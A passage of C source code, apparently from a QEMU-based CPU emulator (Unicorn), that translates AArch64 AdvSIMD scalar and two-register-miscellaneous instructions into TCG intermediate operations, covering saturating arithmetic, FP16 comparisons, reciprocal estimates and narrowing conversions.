TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_rm = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_rd32 = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_rn, rn, 0, size); read_vec_element_i32(s, tcg_rm, rm, 0, size); switch (opcode) { case 0x1: /* SQADD, UQADD */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qadd_s8, gen_helper_neon_qadd_u8 }, { gen_helper_neon_qadd_s16, gen_helper_neon_qadd_u16 }, { gen_helper_neon_qadd_s32, gen_helper_neon_qadd_u32 }, }; genenvfn = fns[size][u]; break; } case 0x5: /* SQSUB, UQSUB */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qsub_s8, gen_helper_neon_qsub_u8 }, { gen_helper_neon_qsub_s16, gen_helper_neon_qsub_u16 }, { gen_helper_neon_qsub_s32, gen_helper_neon_qsub_u32 }, }; genenvfn = fns[size][u]; break; } case 0x9: /* SQSHL, UQSHL */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qshl_s8, gen_helper_neon_qshl_u8 }, { gen_helper_neon_qshl_s16, gen_helper_neon_qshl_u16 }, { gen_helper_neon_qshl_s32, gen_helper_neon_qshl_u32 }, }; genenvfn = fns[size][u]; break; } case 0xb: /* SQRSHL, UQRSHL */ { static NeonGenTwoOpEnvFn * const fns[3][2] = { { gen_helper_neon_qrshl_s8, gen_helper_neon_qrshl_u8 }, { gen_helper_neon_qrshl_s16, gen_helper_neon_qrshl_u16 }, { gen_helper_neon_qrshl_s32, gen_helper_neon_qrshl_u32 }, }; genenvfn = fns[size][u]; break; } case 0x16: /* SQDMULH, SQRDMULH */ { static NeonGenTwoOpEnvFn * const fns[2][2] = { { gen_helper_neon_qdmulh_s16, gen_helper_neon_qrdmulh_s16 }, { gen_helper_neon_qdmulh_s32, gen_helper_neon_qrdmulh_s32 }, }; assert(size == 1 || size == 2); genenvfn = fns[size - 1][u]; break; } default: g_assert_not_reached(); } genenvfn(tcg_ctx, tcg_rd32, tcg_ctx->cpu_env, tcg_rn, tcg_rm); tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_rd32); tcg_temp_free_i32(tcg_ctx, tcg_rd32); tcg_temp_free_i32(tcg_ctx, tcg_rn); tcg_temp_free_i32(tcg_ctx, tcg_rm); } write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rd); } /* AdvSIMD scalar three same FP16 * 31 30 29 28 24 23 22 21 20 16 15 14 13 11 10 9 5 4 0 * +-----+---+-----------+---+-----+------+-----+--------+---+----+----+ * | 0 1 | U | 1 1 1 1 0 | a | 1 0 | Rm | 0 0 | opcode | 1 | Rn | Rd | * +-----+---+-----------+---+-----+------+-----+--------+---+----+----+ * v: 0101 1110 0100 0000 0000 0100 0000 0000 => 5e400400 * m: 1101 1111 0110 0000 1100 0100 0000 0000 => df60c400 */ static void disas_simd_scalar_three_reg_same_fp16(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 3); int rm = extract32(insn, 16, 5); bool u = extract32(insn, 29, 1); bool a = extract32(insn, 23, 1); int fpopcode = opcode | (a << 3) | (u << 4); TCGv_ptr fpst; TCGv_i32 tcg_op1; TCGv_i32 tcg_op2; TCGv_i32 tcg_res; switch (fpopcode) { case 0x03: /* FMULX */ case 0x04: /* FCMEQ (reg) */ case 0x07: /* FRECPS */ case 0x0f: /* FRSQRTS */ case 0x14: /* FCMGE (reg) */ case 0x15: /* FACGE */ case 0x1a: /* FABD */ case 0x1c: /* FCMGT (reg) */ case 0x1d: /* FACGT */ break; default: unallocated_encoding(s); return; } if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); } if (!fp_access_check(s)) { return; } fpst = get_fpstatus_ptr(tcg_ctx, true); tcg_op1 = read_fp_hreg(s, rn); tcg_op2 = read_fp_hreg(s, rm); tcg_res = tcg_temp_new_i32(tcg_ctx); switch (fpopcode) { case 0x03: /* FMULX */ gen_helper_advsimd_mulxh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x04: /* FCMEQ (reg) */ gen_helper_advsimd_ceq_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x07: /* FRECPS */ gen_helper_recpsf_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x0f: /* FRSQRTS */ gen_helper_rsqrtsf_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x14: /* FCMGE (reg) */ gen_helper_advsimd_cge_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x15: /* FACGE */ gen_helper_advsimd_acge_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1a: /* FABD */ gen_helper_advsimd_subh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); tcg_gen_andi_i32(tcg_ctx, tcg_res, tcg_res, 0x7fff); break; case 0x1c: /* FCMGT (reg) */ gen_helper_advsimd_cgt_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1d: /* FACGT */ gen_helper_advsimd_acgt_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: g_assert_not_reached(); } write_fp_sreg(s, rd, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_ptr(tcg_ctx, fpst); } /* AdvSIMD scalar three same extra * 31 30 29 28 24 23 22 21 20 16 15 14 11 10 9 5 4 0 * +-----+---+-----------+------+---+------+---+--------+---+----+----+ * | 0 1 | U | 1 1 1 1 0 | size | 0 | Rm | 1 | opcode | 1 | Rn | Rd | * +-----+---+-----------+------+---+------+---+--------+---+----+----+ */ static void disas_simd_scalar_three_reg_same_extra(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 4); int rm = extract32(insn, 16, 5); int size = extract32(insn, 22, 2); bool u = extract32(insn, 29, 1); TCGv_i32 ele1, ele2, ele3; TCGv_i64 res; bool feature; switch (u * 16 + opcode) { case 0x10: /* SQRDMLAH (vector) */ case 0x11: /* SQRDMLSH (vector) */ if (size != 1 && size != 2) { unallocated_encoding(s); return; } feature = dc_isar_feature(aa64_rdm, s); break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } /* Do a single operation on the lowest element in the vector. * We use the standard Neon helpers and rely on 0 OP 0 == 0 * with no side effects for all these operations. * OPTME: special-purpose helpers would avoid doing some * unnecessary work in the helper for the 16 bit cases. */ ele1 = tcg_temp_new_i32(tcg_ctx); ele2 = tcg_temp_new_i32(tcg_ctx); ele3 = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, ele1, rn, 0, size); read_vec_element_i32(s, ele2, rm, 0, size); read_vec_element_i32(s, ele3, rd, 0, size); switch (opcode) { case 0x0: /* SQRDMLAH */ if (size == 1) { gen_helper_neon_qrdmlah_s16(tcg_ctx, ele3, tcg_ctx->cpu_env, ele1, ele2, ele3); } else { gen_helper_neon_qrdmlah_s32(tcg_ctx, ele3, tcg_ctx->cpu_env, ele1, ele2, ele3); } break; case 0x1: /* SQRDMLSH */ if (size == 1) { gen_helper_neon_qrdmlsh_s16(tcg_ctx, ele3, tcg_ctx->cpu_env, ele1, ele2, ele3); } else { gen_helper_neon_qrdmlsh_s32(tcg_ctx, ele3, tcg_ctx->cpu_env, ele1, ele2, ele3); } break; default: g_assert_not_reached(); } tcg_temp_free_i32(tcg_ctx, ele1); tcg_temp_free_i32(tcg_ctx, ele2); res = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, res, ele3); tcg_temp_free_i32(tcg_ctx, ele3); write_fp_dreg(s, rd, res); tcg_temp_free_i64(tcg_ctx, res); } static void handle_2misc_64(DisasContext *s, int opcode, bool u, TCGv_i64 tcg_rd, TCGv_i64 tcg_rn, TCGv_i32 tcg_rmode, TCGv_ptr tcg_fpstatus) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Handle 64->64 opcodes which are shared between the scalar and * vector 2-reg-misc groups. We cover every integer opcode where size == 3 * is valid in either group and also the double-precision fp ops. * The caller only need provide tcg_rmode and tcg_fpstatus if the op * requires them. */ TCGCond cond; switch (opcode) { case 0x4: /* CLS, CLZ */ if (u) { tcg_gen_clzi_i64(tcg_ctx, tcg_rd, tcg_rn, 64); } else { tcg_gen_clrsb_i64(tcg_ctx, tcg_rd, tcg_rn); } break; case 0x5: /* NOT */ /* This opcode is shared with CNT and RBIT but we have earlier * enforced that size == 3 if and only if this is the NOT insn. */ tcg_gen_not_i64(tcg_ctx, tcg_rd, tcg_rn); break; case 0x7: /* SQABS, SQNEG */ if (u) { gen_helper_neon_qneg_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); } else { gen_helper_neon_qabs_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); } break; case 0xa: /* CMLT */ /* 64 bit integer comparison against zero, result is * test ? (2^64 - 1) : 0. We implement via setcond(!test) and * subtracting 1. */ cond = TCG_COND_LT; do_cmop: tcg_gen_setcondi_i64(tcg_ctx, cond, tcg_rd, tcg_rn, 0); tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd); break; case 0x8: /* CMGT, CMGE */ cond = u ? TCG_COND_GE : TCG_COND_GT; goto do_cmop; case 0x9: /* CMEQ, CMLE */ cond = u ? TCG_COND_LE : TCG_COND_EQ; goto do_cmop; case 0xb: /* ABS, NEG */ if (u) { tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rn); } else { tcg_gen_abs_i64(tcg_ctx, tcg_rd, tcg_rn); } break; case 0x2f: /* FABS */ gen_helper_vfp_absd(tcg_ctx, tcg_rd, tcg_rn); break; case 0x6f: /* FNEG */ gen_helper_vfp_negd(tcg_ctx, tcg_rd, tcg_rn); break; case 0x7f: /* FSQRT */ gen_helper_vfp_sqrtd(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); break; case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x1c: /* FCVTAS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_tosqd(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x5c: /* FCVTAU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_touqd(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } case 0x18: /* FRINTN */ case 0x19: /* FRINTM */ case 0x38: /* FRINTP */ case 0x39: /* FRINTZ */ case 0x58: /* FRINTA */ case 0x79: /* FRINTI */ gen_helper_rintd(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); break; case 0x59: /* FRINTX */ gen_helper_rintd_exact(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); break; case 0x1e: /* FRINT32Z */ case 0x5e: /* FRINT32X */ gen_helper_frint32_d(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); break; case 0x1f: /* FRINT64Z */ case 0x5f: /* FRINT64X */ gen_helper_frint64_d(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); break; default: g_assert_not_reached(); } } static void handle_2misc_fcmp_zero(DisasContext *s, int opcode, bool is_scalar, bool is_u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool is_double = (size == MO_64); TCGv_ptr fpst; if (!fp_access_check(s)) { return; } fpst = get_fpstatus_ptr(tcg_ctx, size == MO_16); if (is_double) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); NeonGenTwoDoubleOPFn *genfn = NULL; bool swap = false; int pass; switch (opcode) { case 0x2e: /* FCMLT (zero) */ swap = true; /* fallthrough */ case 0x2c: /* FCMGT (zero) */ genfn = gen_helper_neon_cgt_f64; break; case 0x2d: /* FCMEQ (zero) */ genfn = gen_helper_neon_ceq_f64; break; case 0x6d: /* FCMLE (zero) */ swap = true; /* fall through */ case 0x6c: /* FCMGE (zero) */ genfn = gen_helper_neon_cge_f64; break; default: g_assert_not_reached(); } for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { read_vec_element(s, tcg_op, rn, pass, MO_64); if (swap) { genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op, fpst); } else { genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero, fpst); } write_vec_element(s, tcg_res, rd, pass, MO_64); } tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_zero); tcg_temp_free_i64(tcg_ctx, tcg_op); clear_vec_high(s, !is_scalar, rd); } else { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); NeonGenTwoSingleOPFn *genfn = NULL; bool swap = false; int pass, maxpasses; if (size == MO_16) { switch (opcode) { case 0x2e: /* FCMLT (zero) */ swap = true; /* fall through */ case 0x2c: /* FCMGT (zero) */ genfn = gen_helper_advsimd_cgt_f16; break; case 0x2d: /* FCMEQ (zero) */ genfn = gen_helper_advsimd_ceq_f16; break; case 0x6d: /* FCMLE (zero) */ swap = true; /* fall through */ case 0x6c: /* FCMGE (zero) */ genfn = gen_helper_advsimd_cge_f16; break; default: g_assert_not_reached(); } } else { switch (opcode) { case 0x2e: /* FCMLT (zero) */ swap = true; /* fall through */ case 0x2c: /* FCMGT (zero) */ genfn = gen_helper_neon_cgt_f32; break; case 0x2d: /* FCMEQ (zero) */ genfn = gen_helper_neon_ceq_f32; break; case 0x6d: /* FCMLE (zero) */ swap = true; /* fall through */ case 0x6c: /* FCMGE (zero) */ genfn = gen_helper_neon_cge_f32; break; default: g_assert_not_reached(); } } if (is_scalar) { maxpasses = 1; } else { int vector_size = 8 << is_q; maxpasses = vector_size >> size; } for (pass = 0; pass < maxpasses; pass++) { read_vec_element_i32(s, tcg_op, rn, pass, size); if (swap) { genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op, fpst); } else { genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero, fpst); } if (is_scalar) { write_fp_sreg(s, rd, tcg_res); } else { write_vec_element_i32(s, tcg_res, rd, pass, size); } } tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_zero); tcg_temp_free_i32(tcg_ctx, tcg_op); if (!is_scalar) { clear_vec_high(s, is_q, rd); } } tcg_temp_free_ptr(tcg_ctx, fpst); } static void handle_2misc_reciprocal(DisasContext *s, int opcode, bool is_scalar, bool is_u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool is_double = (size == 3); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); if (is_double) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); int pass; for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { read_vec_element(s, tcg_op, rn, pass, MO_64); switch (opcode) { case 0x3d: /* FRECPE */ gen_helper_recpe_f64(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x3f: /* FRECPX */ gen_helper_frecpx_f64(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x7d: /* FRSQRTE */ gen_helper_rsqrte_f64(tcg_ctx, tcg_res, tcg_op, fpst); break; default: g_assert_not_reached(); } write_vec_element(s, tcg_res, rd, pass, MO_64); } tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op); clear_vec_high(s, !is_scalar, rd); } else { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); int pass, maxpasses; if (is_scalar) { maxpasses = 1; } else { maxpasses = is_q ? 4 : 2; } for (pass = 0; pass < maxpasses; pass++) { read_vec_element_i32(s, tcg_op, rn, pass, MO_32); switch (opcode) { case 0x3c: /* URECPE */ gen_helper_recpe_u32(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x3d: /* FRECPE */ gen_helper_recpe_f32(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x3f: /* FRECPX */ gen_helper_frecpx_f32(tcg_ctx, tcg_res, tcg_op, fpst); break; case 0x7d: /* FRSQRTE */ gen_helper_rsqrte_f32(tcg_ctx, tcg_res, tcg_op, fpst); break; default: g_assert_not_reached(); } if (is_scalar) { write_fp_sreg(s, rd, tcg_res); } else { write_vec_element_i32(s, tcg_res, rd, pass, MO_32); } } tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op); if (!is_scalar) { clear_vec_high(s, is_q, rd); } } tcg_temp_free_ptr(tcg_ctx, fpst); } static void handle_2misc_narrow(DisasContext *s, bool scalar, int opcode, bool u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Handle 2-reg-misc ops which are narrowing (so each 2*size element * in the source becomes a size element in the destination). */ int pass; TCGv_i32 tcg_res[2]; int destelt = is_q ? 2 : 0; int passes = scalar ? 1 : 2; if (scalar) { tcg_res[1] = tcg_const_i32(tcg_ctx, 0); } for (pass = 0; pass < passes; pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); NeonGenNarrowFn *genfn = NULL; NeonGenNarrowEnvFn *genenvfn = NULL; if (scalar) { read_vec_element(s, tcg_op, rn, pass, size + 1); } else { read_vec_element(s, tcg_op, rn, pass, MO_64); } tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); switch (opcode) { case 0x12: /* XTN, SQXTUN */ { static NeonGenNarrowFn * const xtnfns[3] = { gen_helper_neon_narrow_u8, gen_helper_neon_narrow_u16, tcg_gen_extrl_i64_i32, }; static NeonGenNarrowEnvFn * const sqxtunfns[3] = { gen_helper_neon_unarrow_sat8, gen_helper_neon_unarrow_sat16, gen_helper_neon_unarrow_sat32, }; if (u) { genenvfn = sqxtunfns[size]; } else { genfn = xtnfns[size]; } break; } case 0x14: /* SQXTN, UQXTN */ { static NeonGenNarrowEnvFn * const fns[3][2] = { { gen_helper_neon_narrow_sat_s8, gen_helper_neon_narrow_sat_u8 }, { gen_helper_neon_narrow_sat_s16, gen_helper_neon_narrow_sat_u16 }, { gen_helper_neon_narrow_sat_s32, gen_helper_neon_narrow_sat_u32 }, }; genenvfn = fns[size][u]; break; } case 0x16: /* FCVTN, FCVTN2 */ /* 32 bit to 16 bit or 64 bit to 32 bit float conversion */ if (size == 2) { gen_helper_vfp_fcvtsd(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); } else { TCGv_i32 tcg_lo = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_hi = tcg_temp_new_i32(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); TCGv_i32 ahp = get_ahp_flag(tcg_ctx); tcg_gen_extr_i64_i32(tcg_ctx, tcg_lo, tcg_hi, tcg_op); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_lo, tcg_lo, fpst, ahp); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_hi, tcg_hi, fpst, ahp); tcg_gen_deposit_i32(tcg_ctx, tcg_res[pass], tcg_lo, tcg_hi, 16, 16); tcg_temp_free_i32(tcg_ctx, tcg_lo); tcg_temp_free_i32(tcg_ctx, tcg_hi); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, ahp); } break; case 0x56: /* FCVTXN, FCVTXN2 */ /* 64 bit to 32 bit float conversion * with von Neumann rounding (round to odd) */ assert(size == 2); gen_helper_fcvtx_f64_to_f32(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); break; default: g_assert_not_reached(); } if (genfn) { genfn(tcg_ctx, tcg_res[pass], tcg_op); } else if (genenvfn) { genenvfn(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_op); } tcg_temp_free_i64(tcg_ctx, tcg_op); } for (pass = 0; pass < 2; pass++) { write_vec_element_i32(s, tcg_res[pass], rd, destelt + pass, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); } clear_vec_high(s, is_q, rd); } /* Remaining saturating accumulating ops */ static void handle_2misc_satacc(DisasContext *s, bool is_scalar, bool is_u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool is_double = (size == 3); if (is_double) { TCGv_i64 tcg_rn = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); int pass; for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { read_vec_element(s, tcg_rn, rn, pass, MO_64); read_vec_element(s, tcg_rd, rd, pass, MO_64); if (is_u) { /* USQADD */ gen_helper_neon_uqadd_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); } else { /* SUQADD */ gen_helper_neon_sqadd_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); } write_vec_element(s, tcg_rd, rd, pass, MO_64); } tcg_temp_free_i64(tcg_ctx, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); clear_vec_high(s, !is_scalar, rd); } else { TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); int pass, maxpasses; if (is_scalar) { maxpasses = 1; } else { maxpasses = is_q ? 4 : 2; } for (pass = 0; pass < maxpasses; pass++) { if (is_scalar) { read_vec_element_i32(s, tcg_rn, rn, pass, size); read_vec_element_i32(s, tcg_rd, rd, pass, size); } else { read_vec_element_i32(s, tcg_rn, rn, pass, MO_32); read_vec_element_i32(s, tcg_rd, rd, pass, MO_32); } if (is_u) { /* USQADD */ switch (size) { case 0: gen_helper_neon_uqadd_s8(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; case 1: gen_helper_neon_uqadd_s16(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; case 2: gen_helper_neon_uqadd_s32(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; default: g_assert_not_reached(); } } else { /* SUQADD */ switch (size) { case 0: gen_helper_neon_sqadd_u8(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; case 1: gen_helper_neon_sqadd_u16(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; case 2: gen_helper_neon_sqadd_u32(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rd); break; default: g_assert_not_reached(); } } if (is_scalar) { TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); write_vec_element(s, tcg_zero, rd, 0, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_zero); } write_vec_element_i32(s, tcg_rd, rd, pass, MO_32); } tcg_temp_free_i32(tcg_ctx, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rn); clear_vec_high(s, is_q, rd); } } /* AdvSIMD scalar two reg misc * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 * +-----+---+-----------+------+-----------+--------+-----+------+------+ * | 0 1 | U | 1 1 1 1 0 | size | 1 0 0 0 0 | opcode | 1 0 | Rn | Rd | * +-----+---+-----------+------+-----------+--------+-----+------+------+ */ static void disas_simd_scalar_two_reg_misc(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 12, 5); int size = extract32(insn, 22, 2); bool u = extract32(insn, 29, 1); bool is_fcvt = false; int rmode; TCGv_i32 tcg_rmode; TCGv_ptr tcg_fpstatus; switch (opcode) { case 0x3: /* USQADD / SUQADD*/ if (!fp_access_check(s)) { return; } handle_2misc_satacc(s, true, u, false, size, rn, rd); return; case 0x7: /* SQABS / SQNEG */ break; case 0xa: /* CMLT */ if (u) { unallocated_encoding(s); return; } /* fall through */ case 0x8: /* CMGT, CMGE */ case 0x9: /* CMEQ, CMLE */ case 0xb: /* ABS, NEG */ if (size != 3) { unallocated_encoding(s); return; } break; case 0x12: /* SQXTUN */ if (!u) { unallocated_encoding(s); return; } /* fall through */ case 0x14: /* SQXTN, UQXTN */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_narrow(s, true, opcode, u, false, size, rn, rd); return; case 0xc: case 0xd: case 0xe: case 0xf: case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1f: /* Floating point: U, size[1] and opcode indicate operation; * size[0] indicates single or double precision. */ opcode |= (extract32(size, 1, 1) << 5) | (u << 6); size = extract32(size, 0, 1) ? 3 : 2; switch (opcode) { case 0x2c: /* FCMGT (zero) */ case 0x2d: /* FCMEQ (zero) */ case 0x2e: /* FCMLT (zero) */ case 0x6c: /* FCMGE (zero) */ case 0x6d: /* FCMLE (zero) */ handle_2misc_fcmp_zero(s, opcode, true, u, true, size, rn, rd); return; case 0x1d: /* SCVTF */ case 0x5d: /* UCVTF */ { bool is_signed = (opcode == 0x1d); if (!fp_access_check(s)) { return; } handle_simd_intfp_conv(s, rd, rn, 1, is_signed, 0, size); return; } case 0x3d: /* FRECPE */ case 0x3f: /* FRECPX */ case 0x7d: /* FRSQRTE */ if (!fp_access_check(s)) { return; } handle_2misc_reciprocal(s, opcode, true, u, true, size, rn, rd); return; case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ is_fcvt = true; rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); break; case 0x1c: /* FCVTAS */ case 0x5c: /* FCVTAU */ /* TIEAWAY doesn't fit in the usual rounding mode encoding */ is_fcvt = true; rmode = FPROUNDING_TIEAWAY; break; case 0x56: /* FCVTXN, FCVTXN2 */ if (size == 2) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_narrow(s, true, opcode, u, false, size - 1, rn, rd); return; default: unallocated_encoding(s); return; } break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (is_fcvt) { tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); tcg_fpstatus = get_fpstatus_ptr(tcg_ctx, false); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); } else { tcg_rmode = NULL; tcg_fpstatus = NULL; } if (size == 3) { TCGv_i64 tcg_rn = read_fp_dreg(s, rn); TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); handle_2misc_64(s, opcode, u, tcg_rd, tcg_rn, tcg_rmode, tcg_fpstatus); write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); } else { TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_rn, rn, 0, size); switch (opcode) { case 0x7: /* SQABS, SQNEG */ { NeonGenOneOpEnvFn *genfn; static NeonGenOneOpEnvFn * const fns[3][2] = { { gen_helper_neon_qabs_s8, gen_helper_neon_qneg_s8 }, { gen_helper_neon_qabs_s16, gen_helper_neon_qneg_s16 }, { gen_helper_neon_qabs_s32, gen_helper_neon_qneg_s32 }, }; genfn = fns[size][u]; genfn(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); break; } case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x1c: /* FCVTAS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_tosls(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x5c: /* FCVTAU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_touls(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } default: g_assert_not_reached(); } write_fp_sreg(s, rd, tcg_rd); 